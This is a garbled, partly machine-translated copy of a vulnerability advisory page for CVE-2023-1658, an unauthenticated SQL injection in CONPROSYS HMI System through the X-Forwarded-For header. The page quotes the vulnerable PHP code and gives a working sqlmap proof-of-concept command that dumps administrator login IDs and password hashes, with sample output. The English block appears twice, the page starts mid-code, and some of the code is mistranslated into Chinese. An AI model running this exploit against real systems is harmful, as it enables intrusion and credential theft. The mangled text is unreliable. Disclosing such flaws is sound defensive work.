l . "','" . $v . "','" . $p . "',true," . ($b ? 'true' : 'false')); It uses the client IP address to fill in the client_ip column in the m_user_login table. The IP address can be taken from an attacker-controlled X-Forwarded-For header: from: CPostgreSQL.php static function v() { if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) return $_SERVER['HTTP_X_FORWARDED_FOR']; if (isset($_SERVER['REMOTE_ADDR'])) return $_SERVER['REMOTE_ADDR']; return ''; } The X-Forwarded-For header is not sanitized, allowing SQL injection via a PostgreSQL INSERT statement: from: CPostgreSQL.php function _a($a, $e) { if ($a == null || $a == '' || $e == null || $e == '') { $this->a = 'Error: Invalid parameter.'; return FALSE; } if ($this->_ == null) { if (!$this->k()) return FALSE; } if ($this->_ == null) { $this->a = 'Error: Not connected.'; return FALSE; } $c = 'insert into ' . $this->f . ' (' . $a . ') values (' . $e . ')'; $_ = FALSE; try { $d = $this->_->prepare($c); $_ = $d->execute(); PoC The following sqlmap command extracts user names and password hashes in the companys.dbo.s_users table: sqlmap -u 'http:///php/login.php' --data='uid=admin&pwd=aaaa&cid=admin&pid=admin&type=admin,user&nname=1&lang=en' –headers="X-Forwarded-For:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa*" --technique=T --level 5 --risk 3 --ignore-code=401 --dbms=PostgreSQL -p 'X-Forwarded-For' --no-cast --drop-set-cookie --dump -D dbo -T s_users -C login_id,login_password [1 entry] +----------+-------------------------------------------------------------------+ | login_id | login_password | +----------+-------------------------------------------------------------------+ | admin | :a0edf1520405d98745153ca965fb376e62b662d1ae4316ab4af3402e44b859f5 | +----------+-------------------------------------------------------------------+"> cve - 2023 - 1658 |站得住脚的® -
检测
分析

cve - 2023 - 1658

至关重要的

描述

有一个SQL注入漏洞该系统(CHS) 3.5.1 CONPROSYS人机界面。未经过身份验证的远程攻击者可以利用它来列举CHS数据库。dbo CHS日志登录尝试。m_user_login表在PostgreSQL数据库:从:auth_login。php v =美元d5: v ();/ /得到客户端IP地址($ l ! = null) {$ p =广告(());(q = new d5美元我,空,空,“dbo.m_user_login”);尝试{$ q - > (_S34_”,’”。美元o。“”、“”。$ l - > l。 "','" . $v . "','" . $p . "',true," . ($b ? 'true' : 'false')); It uses the client IP address to fill in the client_ip column in the m_user_login table. The IP address can be taken from an attacker-controlled X-Forwarded-For header: from: CPostgreSQL.php static function v() { if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) return $_SERVER['HTTP_X_FORWARDED_FOR']; if (isset($_SERVER['REMOTE_ADDR'])) return $_SERVER['REMOTE_ADDR']; return ''; } The X-Forwarded-For header is not sanitized, allowing SQL injection via a PostgreSQL INSERT statement: from: CPostgreSQL.php function _a($a, $e) { if ($a == null || $a == '' || $e == null || $e == '') { $this->a = 'Error: Invalid parameter.'; return FALSE; } if ($this->_ == null) { if (!$this->k()) return FALSE; } if ($this->_ == null) { $this->a = 'Error: Not connected.'; return FALSE; } $c = 'insert into ' . $this->f . ' (' . $a . ') values (' . $e . ')'; $_ = FALSE; try { $d = $this->_->prepare($c); $_ = $d->execute(); PoC The following sqlmap command extracts user names and password hashes in the companys.dbo.s_users table: sqlmap -u 'http:///php/login.php' --data='uid=admin&pwd=aaaa&cid=admin&pid=admin&type=admin,user&nname=1&lang=en' –headers="X-Forwarded-For:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa*" --technique=T --level 5 --risk 3 --ignore-code=401 --dbms=PostgreSQL -p 'X-Forwarded-For' --no-cast --drop-set-cookie --dump -D dbo -T s_users -C login_id,login_password [1 entry] +----------+-------------------------------------------------------------------+ | login_id | login_password | +----------+-------------------------------------------------------------------+ | admin | :a0edf1520405d98745153ca965fb376e62b662d1ae4316ab4af3402e44b859f5 | +----------+-------------------------------------------------------------------+

细节

发表:2023-03-31

风险信息

CVSS v2

基础分数:7.5

向量:CVSS2 # AV: N /交流:L /非盟:N / C: P / I: P / A: P

严重程度:

CVSS v3

基础分数:9.8

向量:CVSS: 3.0 / AV: N /交流:L /公关:UI: N / N / S: U / C: H /我:H: H

严重程度:至关重要的

Baidu
map